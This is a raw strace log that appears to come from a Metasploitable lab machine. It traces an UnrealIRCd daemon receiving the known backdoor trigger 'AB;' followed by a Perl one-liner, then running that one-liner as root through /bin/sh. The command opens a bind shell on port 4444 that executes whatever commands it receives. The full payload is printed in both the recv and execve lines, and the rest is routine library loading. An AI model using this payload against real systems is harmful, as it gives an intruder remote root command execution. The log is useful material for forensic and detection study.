4519  07:32:55.628071 select(1024, [2 3 4 7 9], [], NULL, {0, 560000}) = 1 (in [2], left {0, 400000})

4519  07:32:55.789790 clock_gettime(CLOCK_MONOTONIC, {2385, 606811594}) = 0

4519  07:32:55.789812 accept(2, 0, NULL) = 5

4519  07:32:55.789832 getpeername(5, {sa_family=AF_INET, sin_port=htons(32989), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:32:55.789863 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:55.789875 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:55.789888 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:32:55.789900 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:32:55.789911 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:32:55.789922 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:32:55.789936 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:32:55.789952 clock_gettime(CLOCK_MONOTONIC, {2385, 606966038}) = 0

4519  07:32:55.789998 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:32:55.790045 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:55.790070 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:55.790080 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:32:55.790091 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:32:55.790108 send(6, "\320\351\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:32:55.790214 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:32:55.790254 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:32:55.790402 gettimeofday({1495625575, 790409}, NULL) = 0

4519  07:32:55.790419 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:32:55.795804 clock_gettime(CLOCK_MONOTONIC, {2385, 612833718}) = 0

4519  07:32:55.795834 recvfrom(6, "\320\351\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\'\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:32:55.795875 close(6)          = 0

4519  07:32:55.795891 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:32:55.795906 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:32:55.795996 time(NULL)        = 1495625575

4519  07:32:55.796011 time(NULL)        = 1495625575

4519  07:32:55.796036 gettimeofday({1495625575, 796040}, NULL) = 0

4519  07:32:55.796048 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:32:55.796077 clock_gettime(CLOCK_MONOTONIC, {2385, 613090100}) = 0

4519  07:32:55.796088 gettimeofday({1495625575, 796091}, NULL) = 0

4519  07:32:55.796098 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:32:55.796138 clock_gettime(CLOCK_MONOTONIC, {2385, 613150710}) = 0

4519  07:32:55.796149 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:32:55.796178 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:32:55.796197 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:32:55.796209 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:32:55.796224 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10419

10419 07:32:55.796291 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10419 07:32:55.796305 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10419 07:32:55.796316 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10419 07:32:55.796329 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10419 07:32:55.796456 brk(0)            = 0x80f9000

10419 07:32:55.796480 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.796496 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f92000

10419 07:32:55.796513 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.796530 open("/etc/ld.so.cache", O_RDONLY) = 1

10419 07:32:55.796543 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10419 07:32:55.796562 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8a000

10419 07:32:55.796573 close(1)          = 0

10419 07:32:55.796584 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.796599 open("/lib/libncurses.so.5", O_RDONLY) = 1

10419 07:32:55.796612 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10419 07:32:55.796707 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10419 07:32:55.796724 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5a000

10419 07:32:55.796736 mmap2(0xb7f87000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f87000

10419 07:32:55.796753 close(1)          = 0

10419 07:32:55.796764 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.796778 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10419 07:32:55.796792 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10419 07:32:55.796883 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10419 07:32:55.796900 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f56000

10419 07:32:55.796911 mmap2(0xb7f58000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f58000

10419 07:32:55.796927 close(1)          = 0

10419 07:32:55.796955 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.796969 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10419 07:32:55.796984 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10419 07:32:55.797073 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10419 07:32:55.797090 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f55000

10419 07:32:55.797104 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e06000

10419 07:32:55.797115 mmap2(0xb7f4f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f4f000

10419 07:32:55.797129 mmap2(0xb7f52000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f52000

10419 07:32:55.797143 close(1)          = 0

10419 07:32:55.797165 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e05000

10419 07:32:55.797177 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e056b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10419 07:32:55.797233 mprotect(0xb7f4f000, 4096, PROT_READ) = 0

10419 07:32:55.797268 munmap(0xb7f8a000, 29913) = 0

10419 07:32:55.797294 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10419 07:32:55.797308 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10419 07:32:55.797327 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb394f0) = -1 ENOTTY (Inappropriate ioctl for device)

10419 07:32:55.797357 brk(0)            = 0x80f9000

10419 07:32:55.797367 brk(0x80fa000)    = 0x80fa000

10419 07:32:55.797379 brk(0x80fb000)    = 0x80fb000

10419 07:32:55.797395 getuid32()        = 0

10419 07:32:55.797404 getgid32()        = 0

10419 07:32:55.797413 geteuid32()       = 0

10419 07:32:55.797422 getegid32()       = 0

10419 07:32:55.797433 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10419 07:32:55.797433 time(NULL)        = 1495625575

10419 07:32:55.797433 brk(0x80fc000)    = 0x80fc000

10419 07:32:55.797433 brk(0x80fd000)    = 0x80fd000

10419 07:32:55.797433 open("/proc/meminfo", O_RDONLY) = 1

10419 07:32:55.797434 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10419 07:32:55.797434 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f91000

10419 07:32:55.797434 read(1, "MemTotal:      1035240 kB\nMemFree:        416392 kB\nBuffers:         77332 kB\nCached:         382200 kB\nSwapCached:          0 kB\nActive:         256424 kB\nInactive:       332064 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        416152 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4892 kB\nWriteback:           0 kB\nAnonPages:      128964 kB\nMapped:          52008 kB\nSlab:            19200 kB\nSReclaimable:    10620 kB\nSUnreclaim:       8580 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10419 07:32:55.797434 close(1)          = 0

10419 07:32:55.797435 munmap(0xb7f91000, 4096) = 0

10419 07:32:55.797435 brk(0x80fe000)    = 0x80fe000

10419 07:32:55.797435 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10419 07:32:55.797438 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10419 07:32:55.797451 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10419 07:32:55.797463 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10419 07:32:55.797533 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10419 07:32:55.797546 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10419 07:32:55.797575 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10419 07:32:55.797587 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10419 07:32:55.797600 uname({sys="Linux", node="metasploitable", ...}) = 0

10419 07:32:55.797648 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10419 07:32:55.797666 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10419 07:32:55.797685 brk(0x8100000)    = 0x8100000

10419 07:32:55.797697 getcwd("/etc/unreal", 4096) = 12

10419 07:32:55.797712 getpid()          = 10419

10419 07:32:55.797728 getppid()         = 4519

10419 07:32:55.797744 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10419 07:32:55.797763 stat64("/sbin/sh", 0xbfb394c8) = -1 ENOENT (No such file or directory)

10419 07:32:55.797776 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10419 07:32:55.797793 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10419 07:32:55.797817 socket(PF_FILE, SOCK_STREAM, 0) = 1

10419 07:32:55.797830 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10419 07:32:55.797842 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10419 07:32:55.797864 close(1)          = 0

10419 07:32:55.797875 socket(PF_FILE, SOCK_STREAM, 0) = 1

10419 07:32:55.797885 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10419 07:32:55.797896 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10419 07:32:55.797913 close(1)          = 0

10419 07:32:55.797927 open("/etc/nsswitch.conf", O_RDONLY) = 1

10419 07:32:55.797941 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10419 07:32:55.797958 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f91000

10419 07:32:55.797969 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10419 07:32:55.798032 read(1, "", 4096) = 0

10419 07:32:55.798042 close(1)          = 0

10419 07:32:55.798051 munmap(0xb7f91000, 4096) = 0

10419 07:32:55.798068 open("/etc/ld.so.cache", O_RDONLY) = 1

10419 07:32:55.798080 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10419 07:32:55.798153 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8a000

10419 07:32:55.798168 close(1)          = 0

10419 07:32:55.798178 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.798194 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10419 07:32:55.798209 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10419 07:32:55.798302 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10419 07:32:55.798319 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfc000

10419 07:32:55.798331 mmap2(0xb7e03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e03000

10419 07:32:55.798348 close(1)          = 0

10419 07:32:55.798361 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.798374 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10419 07:32:55.798388 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10419 07:32:55.798488 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10419 07:32:55.798533 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de4000

10419 07:32:55.798545 mmap2(0xb7df8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7df8000

10419 07:32:55.798576 mmap2(0xb7dfa000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dfa000

10419 07:32:55.798590 close(1)          = 0

10419 07:32:55.798616 munmap(0xb7f8a000, 29913) = 0

10419 07:32:55.798634 open("/etc/ld.so.cache", O_RDONLY) = 1

10419 07:32:55.798647 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10419 07:32:55.798663 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8a000

10419 07:32:55.798673 close(1)          = 0

10419 07:32:55.798684 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10419 07:32:55.798698 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10419 07:32:55.798712 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10419 07:32:55.798805 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10419 07:32:55.798823 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dda000

10419 07:32:55.798834 mmap2(0xb7de2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7de2000

10419 07:32:55.798850 close(1)          = 0

10419 07:32:55.798863 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

